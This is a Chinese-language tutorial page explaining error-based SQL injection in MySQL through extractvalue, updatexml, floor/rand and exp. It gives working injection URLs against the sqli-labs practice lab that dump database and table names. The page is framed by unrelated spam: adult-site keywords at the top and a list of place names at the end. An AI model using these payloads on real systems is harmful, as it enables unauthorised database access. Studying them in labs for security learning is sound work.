91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SQL報錯注入的示例分析

發布時間:2022-03-03 14:28:45 來源:億速云 閱讀:198 作者:小新 欄目:開發技術

小編給大家分享一下SQL報錯注入的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

    SQL報錯注入概述

    通過構造特定的SQL語句,讓攻擊者想要查詢的信息(如數據庫名、版本號、用戶名等)通過頁面面的錯誤提示回顯出來。

    報錯注入的前提條件

    • Web應用程序未關閉數據庫報錯函數,對于一些SQL語句的錯誤直接回顯在頁面上

    • 后臺未對一些具有報錯功能的函數(如extractvalue、updatexml等)進行過濾

    Xpath類型函數

    extractvalue()

    作用:對XML文檔進行查詢,相當于在HTML文件中用標簽查找元素。

    語法: extractvalue( XML_document, XPath_string )

    • 參數1:XML_document是String格式,為XML文檔對象的名稱

    • 參數2:XPath_string(Xpath格式的字符串),注入時可操作的地方

    報錯原理:xml文檔中查找字符位置是用/xxx/xxx/xxx/...這種格式,如果寫入其他格式就會報錯,并且會返回寫入的非法格式內容,錯誤信息如:XPATH syntax error:'xxxxxxxx‘

    updatexml()

    作用:改變文檔中符合條件的節點的值。

    語法: updatexml( XML_document, XPath_string, new_value )

    • 參數1:XML_document是String格式,為XML文檔對象的名稱

    • 參數2:XPath_string(Xpath格式的字符串),注入時可操作的地方

    • 參數3:new_value,String格式,替換查找到的符合條件的數據

    報錯原理:同extractvalue()

    其他函數

    floor()、rand()、count()、group by聯用

    作用

    floor(x):對參數x向下取整

    rand():生成一個0~1之間的隨機浮點數

    count(*):統計某個表下總共有多少條記錄

    group by x: 按照 (by) 一定的規則(x)進行分組

    報錯原理:group by與rand()使用時,如果臨時表中沒有該主鍵,則在插入前會再計算一次rand(),然后再由group by將計算出來的主鍵直接插入到臨時表格中,導致主鍵重復報錯

    exp()(5.5.5<= MySQL數據庫版本號<=5.5.49)

    作用:計算以e(自然常數)為底的冪值

    語法: exp(x)

    報錯原理:當參數x超過710時,exp()函數會報錯,錯誤信息如:DOUBLE value is of range:

    MySQL數據庫報錯功能函數總匯

    SQL報錯注入的示例分析

    報錯注入實例

    extractvalue()

    依然用sqli/Less-1

    直接用報錯函數進行暴庫操作

    暴庫
    http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

    SQL報錯注入的示例分析

    暴表
    http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

    SQL報錯注入的示例分析

    后面的步驟大致相同,不再演示

    updatexml()

    暴庫
    http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+
    暴表
    http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

    SQL報錯注入的示例分析

    以上是“SQL報錯注入的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

    向AI問一下細節

    免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

    sql
    AI

    凤城市| 莆田市| 新建县| 黄梅县| 罗田县| 双城市| 疏附县| 濮阳市| 清水县| 余庆县| 沙田区| 阳信县| 武鸣县| 灵武市| 叶城县| 鄂托克前旗| 东丽区| 溧阳市| 泰兴市| 淳安县| 罗山县| 海宁市| 康平县| 明星| 二连浩特市| 奉化市| 乳源| 九龙坡区| 郑州市| 关岭| 南岸区| 顺平县| 纳雍县| 明水县| 大渡口区| 盘锦市| 琼海市| 朝阳区| 新津县| 兴隆县| 桐庐县|